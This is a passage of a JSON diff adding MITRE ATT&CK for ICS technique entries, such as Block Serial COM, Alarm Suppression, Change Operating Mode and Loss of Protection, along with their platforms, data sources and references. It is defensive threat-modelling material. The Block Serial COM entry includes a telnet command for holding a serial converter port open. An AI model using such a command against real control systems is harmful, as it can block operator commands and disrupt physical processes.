Consumption Retrieved. 2019/03/14 ", + "url": "http://cwe.mitre.org/data/definitions/400.html" + }, + { + "source_name": "ICS-CERT April 2017", + "description": "ICS-CERT 2017, April 18 CS Alert (ICS-ALERT-17-102-01A) BrickerBot Permanent Denial-of-Service Attack Retrieved. 2019/10/24 ", + "url": "https://www.us-cert.gov/ics/alerts/ICS-ALERT-17-102-01A" + }, + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 27 Advisory (ICSA-15-202-01) - Siemens SIPROTEC Denial-of-Service Vulnerability Retrieved. 2019/03/14 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-15-202-01" + }, + { + "source_name": "MITRE March 2018", + "description": "MITRE 2018, March 22 CVE-2015-5374 Retrieved. 2019/03/14 ", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-5374" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T21:02:54.674Z", + "name": "Block Serial COM", + "description": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages. \n\nA serial to Ethernet converter is often connected to a serial COM to facilitate communication between serial and Ethernet devices. One approach to blocking a serial COM would be to create and hold open a TCP session with the Ethernet side of the converter. A serial to Ethernet converter may have a few ports open to facilitate multiple communications. For example, if there are three serial COM available -- 1, 2 and 3 --, the converter might be listening on the corresponding ports 20001, 20002, and 20003. If a TCP/IP connection is opened with one of these ports and held open, then the port will be unavailable for use by another party. One way the adversary could achieve this would be to initiate a TCP session with the serial to Ethernet converter at 10.0.0.1 via Telnet on serial port 1 with the following command: telnet 10.0.0.1 20001.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Input/Output Server", + "Device Configuration/Parameters" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Process/Event Alarm", + "Process: Process Termination", + "Operational Databases: Process History/Live Data", + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0805", + "external_id": "T0805" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-05-08T20:13:24.241Z", + "name": "Role Identification", + "description": "Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack.\n\nFor example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": true, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--23270e54-1d68-4c3b-b763-b25607bcef80", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-ics-attack", + "url": "https://attack.mitre.org/techniques/T0850", + "external_id": "T0850" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Command-Line Interface", + "description": "Adversaries may utilize command-line interfaces (CLIs) to interact with systems and execute commands. CLIs provide a means of interacting with computer systems and are a common feature across many types of platforms and devices within control systems environments. (Citation: Enterprise ATT&CK January 2018) Adversaries may also use CLIs to install and run new software, including malicious tools that may be installed over the course of an operation.\n\nCLIs are typically accessed locally, but can also be exposed via services, such as SSH, Telnet, and RDP. Commands that are executed in the CLI execute with the current permissions level of the process running the terminal emulator, unless the command specifies a change in permissions context. Many controllers have CLI interfaces for management purposes.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Human-Machine Interface", + "Input/Output Server" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Process: Process Creation", + "Application Log: Application Log Content", + "Command: Command Execution" + ], + "type": "attack-pattern", + "id": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0807", + "external_id": "T0807" + }, + { + "source_name": "Enterprise ATT&CK January 2018", + "description": "Enterprise ATT&CK 2018, January 11 Command-Line Interface Retrieved. 2018/05/17 ", + "url": "https://attack.mitre.org/wiki/Technique/T1059" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Point & Tag Identification", + "description": "Adversaries may collect point and tag values to gain a more comprehensive understanding of the process environment. Points may be values such as inputs, memory locations, outputs or other process specific variables. (Citation: Dennis L. Sloatman September 2016) Tags are the identifiers given to points for operator convenience. \n\nCollecting such tags provides valuable context to environmental points and enables an adversary to map inputs, outputs, and other values to their control processes. Understanding the points being collected may inform an adversary on which processes and values to keep track of over the course of an operation.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Data Historian", + "Control Server", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0861", + "external_id": "T0861" + }, + { + "source_name": "Dennis L. Sloatman September 2016", + "description": "Dennis L. Sloatman 2016, September 16 Understanding PLC Programming Methods and the Tag Database System Retrieved. 2017/12/19 ", + "url": "https://www.radioworld.com/industry/understanding-plc-programming-methods-and-the-tag-database-system" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-09-26T16:50:56.401Z", + "name": "Device Restart/Shutdown", + "description": "Adversaries may forcibly restart or shutdown a device in an ICS environment to disrupt and potentially negatively impact physical processes. Methods of device restart and shutdown exist in some devices as built-in, standard functionalities. These functionalities can be executed using interactive device web interfaces, CLIs, and network protocol commands.\n\nUnexpected restart or shutdown of control system devices may prevent expected response functions happening during critical states.\n\nA device restart can also be a sign of malicious device modifications, as many updates require a shutdown in order to take effect.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_detection": "", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Operational Databases: Device Alarm", + "Network Traffic: Network Traffic Flow", + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0816", + "external_id": "T0816" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "User Execution", + "description": "Adversaries may rely on a targeted organizations user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. \n\nAdversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. (Citation: Booz Allen Hamilton) Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software. (Citation: Daavid Hentunen, Antti Tikkanen June 2014) \n\nA Chinese spearphishing campaign running from December 9, 2011 through February 29, 2012 delivered malware through spearphishing attachments which required user action to achieve execution. (Citation: CISA AA21-201A Pipeline Intrusion July 2021)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Engineering Workstation", + "Human-Machine Interface" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Process: Process Creation", + "Network Traffic: Network Connection Creation", + "Network Traffic: Network Traffic Content", + "Command: Command Execution", + "File: File Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--2736b752-4ec5-4421-a230-8977dea7649c", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0863", + "external_id": "T0863" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + }, + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + }, + { + "source_name": "CISA AA21-201A Pipeline Intrusion July 2021", + "description": "Department of Justice (DOJ), DHS Cybersecurity & Infrastructure Security Agency (CISA) 2021, July 20 Chinese Gas Pipeline Intrusion Campaign, 2011 to 2013 Retrieved. 2021/10/08 ", + "url": "https://us-cert.cisa.gov/sites/default/files/publications/AA21-201A_Chinese_Gas_Pipeline_Intrusion_Campaign_2011_to_2013%20(1).pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:20:38.285Z", + "name": "Wireless Compromise", + "description": "Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device. (Citation: Alexander Bolshev, Gleb Cherbov July 2014) (Citation: Alexander Bolshev March 2014) Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. \n\nA Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. (Citation: John Bill May 2017) (Citation: Shelley Smith February 2008) The remote controller device allowed the student to interface with the trams network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. (Citation: Bruce Schneier January 2008) The controller then enabled initial access to the network, allowing the capture and replay of tram signals. (Citation: John Bill May 2017)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_contributors": [ + "Scott Dougherty" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Control Server", + "Field Controller/RTU/PLC/IED", + "Input/Output Server" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Logon Session: Logon Session Creation", + "Network Traffic: Network Traffic Flow" + ], + "type": "attack-pattern", + "id": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0860", + "external_id": "T0860" + }, + { + "source_name": "Alexander Bolshev March 2014", + "description": "Alexander Bolshev 2014, March 11 S4x14: HART As An Attack Vector Retrieved. 2020/01/05 ", + "url": "https://www.slideshare.net/dgpeters/17-bolshev-1-13" + }, + { + "source_name": "Alexander Bolshev, Gleb Cherbov July 2014", + "description": "Alexander Bolshev, Gleb Cherbov 2014, July 08 ICSCorsair: How I will PWN your ERP through 4-20 mA current loop Retrieved. 2020/01/05 ", + "url": "https://www.blackhat.com/docs/us-14/materials/us-14-Bolshev-ICSCorsair-How-I-Will-PWN-Your-ERP-Through-4-20mA-Current-Loop-WP.pdf" + }, + { + "source_name": "Bruce Schneier January 2008", + "description": "Bruce Schneier 2008, January 17 Hacking Polish Trams Retrieved. 2019/10/17 ", + "url": "https://www.schneier.com/blog/archives/2008/01/hacking_the_pol.html" + }, + { + "source_name": "John Bill May 2017", + "description": "John Bill 2017, May 12 Hacked Cyber Security Railways Retrieved. 2019/10/17 ", + "url": "https://www.londonreconnections.com/2017/hacked-cyber-security-railways/" + }, + { + "source_name": "Shelley Smith February 2008", + "description": "Shelley Smith 2008, February 12 Teen Hacker in Poland Plays Trains and Derails City Tram System Retrieved. 2019/10/17 ", + "url": "https://inhomelandsecurity.com/teen_hacker_in_poland_plays_tr/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Change Operating Mode", + "description": "Adversaries may change the operating mode of a controller to gain additional access to engineering functions such as Program Download. Programmable controllers typically have several modes of operation that control the state of the user program and control access to the controllers API. Operating modes can be physically selected using a key switch on the face of the controller but may also be selected with calls to the controllers API. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic. [Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Safety Instrumented System/Protection Relay", + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Application Log: Application Log Content", + "Network Traffic: Network Traffic Content", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0858", + "external_id": "T0858" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-30T20:13:55.599Z", + "name": "Alarm Suppression", + "description": "Adversaries may target protection function alarms to prevent them from notifying operators of critical conditions. Alarm messages may be a part of an overall reporting system and of particular interest for adversaries. Disruption of the alarm system does not imply the disruption of the reporting system as a whole.\n\nA Secura presentation on targeting OT notes a dual fold goal for adversaries attempting alarm suppression: prevent outgoing alarms from being raised and prevent incoming alarms from being responded to. (Citation: Jos Wetzels, Marina Krotofil 2019) The method of suppression may greatly depend on the type of alarm in question: \n\n* An alarm raised by a protocol message \n* An alarm signaled with I/O \n* An alarm bit set in a flag (and read) \n\nIn ICS environments, the adversary may have to suppress or contend with multiple alarms and/or alarm propagation to achieve a specific goal to evade detection or prevent intended responses from occurring. (Citation: Jos Wetzels, Marina Krotofil 2019) Methods of suppression may involve tampering or altering device displays and logs, modifying in memory code to fixed values, or even tampering with assembly level instruction code.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "inhibit-response-function" + } + ], + "x_mitre_contributors": [ + "Marina Krotofil", + "Jos Wetzels - Midnight Blue" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Device Configuration/Parameters" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [ + "Operational Databases: Process History/Live Data", + "Network Traffic: Network Traffic Flow", + "Operational Databases: Process/Event Alarm", + "Operational Databases: Device Alarm" + ], + "type": "attack-pattern", + "id": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0878", + "external_id": "T0878" + }, + { + "source_name": "Jos Wetzels, Marina Krotofil 2019", + "description": "Jos Wetzels, Marina Krotofil 2019 A Diet of Poisoned Fruit: Designing Implants & OT Payloads for ICS Embedded Devices Retrieved. 2019/11/01 ", + "url": "https://troopers.de/downloads/troopers19/TROOPERS19_NGI_IoT_diet_poisoned_fruit.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Detect Operating Mode", + "description": "Adversaries may gather information about a PLCs or controllers current operating mode. Operating modes dictate what change or maintenance functions can be manipulated and are often controlled by a key switch on the PLC (e.g., run, prog [program], and remote). Knowledge of these states may be valuable to an adversary to determine if they are able to reprogram the PLC. Operating modes and the mechanisms by which they are selected often vary by vendor and product line. Some commonly implemented operating modes are described below: \n\n* Program - This mode must be enabled before changes can be made to a devices program. This allows program uploads and downloads between the device and an engineering workstation. Often the PLCs logic Is halted, and all outputs may be forced off. (Citation: N.A. October 2017) \n* Run - Execution of the devices program occurs in this mode. Input and output (values, points, tags, elements, etc.) are monitored and used according to the programs logic.[Program Upload](https://attack.mitre.org/techniques/T0845) and [Program Download](https://attack.mitre.org/techniques/T0843) are disabled while in this mode. (Citation: Omron) (Citation: Machine Information Systems 2007) (Citation: N.A. October 2017) (Citation: PLCgurus 2021) \n* Remote - Allows for remote changes to a PLCs operation mode. (Citation: PLCgurus 2021) \n* Stop - The PLC and program is stopped, while in this mode, outputs are forced off. (Citation: Machine Information Systems 2007) \n* Reset - Conditions on the PLC are reset to their original states. Warm resets may retain some memory while cold resets will reset all I/O and data registers. (Citation: Machine Information Systems 2007) \n* Test / Monitor mode - Similar to run mode, I/O is processed, although this mode allows for monitoring, force set, resets, and more generally tuning or debugging of the system. Often monitor mode may be used as a trial for initialization. (Citation: Omron)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2aa406ed-81c3-4c1d-ba83-cfbee5a2847a", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0868", + "external_id": "T0868" + }, + { + "source_name": "Machine Information Systems 2007", + "description": "Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 ", + "url": "http://www.machine-information-systems.com/How_PLCs_Work.html" + }, + { + "source_name": "N.A. October 2017", + "description": "N.A. 2017, October What are the different operating modes in PLC? Retrieved. 2021/01/28 ", + "url": "https://forumautomation.com/t/what-are-the-different-operating-modes-in-plc/2489" + }, + { + "source_name": "Omron", + "description": "Omron Machine Information Systems 2007 How PLCs Work Retrieved. 2021/01/28 PLC Different Operating Modes Retrieved. 2021/01/28 ", + "url": "https://www.omron-ap.com/service_support/FAQ/FAQ00002/index.asp#:~:text=In%20PROGRAM%20mode%2C%20the%20CPU,can%20be%20created%20or%20modified." + }, + { + "source_name": "PLCgurus 2021", + "description": "PLCgurus 2021 PLC Basics Modes Of Operation Retrieved. 2021/01/28 ", + "url": "https://www.plcgurus.net/plc-basics/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Loss of Protection", + "description": "Adversaries may compromise protective system functions designed to prevent the effects of faults and abnormal conditions. This can result in equipment damage, prolonged process disruptions and hazards to personnel. \n\nMany faults and abnormal conditions in process control happen too quickly for a human operator to react to. Speed is critical in correcting these conditions to limit serious impacts such as Loss of Control and Property Damage. \n\nAdversaries may target and disable protective system functions as a prerequisite to subsequent attack execution or to allow for future faults and abnormal conditions to go unchecked. Detection of a Loss of Protection by operators can result in the shutdown of a process due to strict policies regarding protection systems. This can cause a Loss of Productivity and Revenue and may meet the technical goals of adversaries seeking to cause process disruptions.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "id": "attack-pattern--2bb4d762-bf4a-4bc3-9318-15cc6a354163", + "created": "2021-04-12T07:57:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0837", + "external_id": "T0837" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Monitor Process State", + "description": "Adversaries may gather information about the physical process state. This information may be used to gain more information about the process itself or used as a trigger for malicious actions. The sources of process state information may vary such as, OPC tags, historian data, specific PLC block information, or network traffic.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Human-Machine Interface", + "Control Server", + "Data Historian", + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [ + "Network Traffic: Network Traffic Content", + "Application Log: Application Log Content" + ], + "type": "attack-pattern", + "id": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0801", + "external_id": "T0801" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Scripting", + "description": "Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. \n\nIn addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "execution" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + 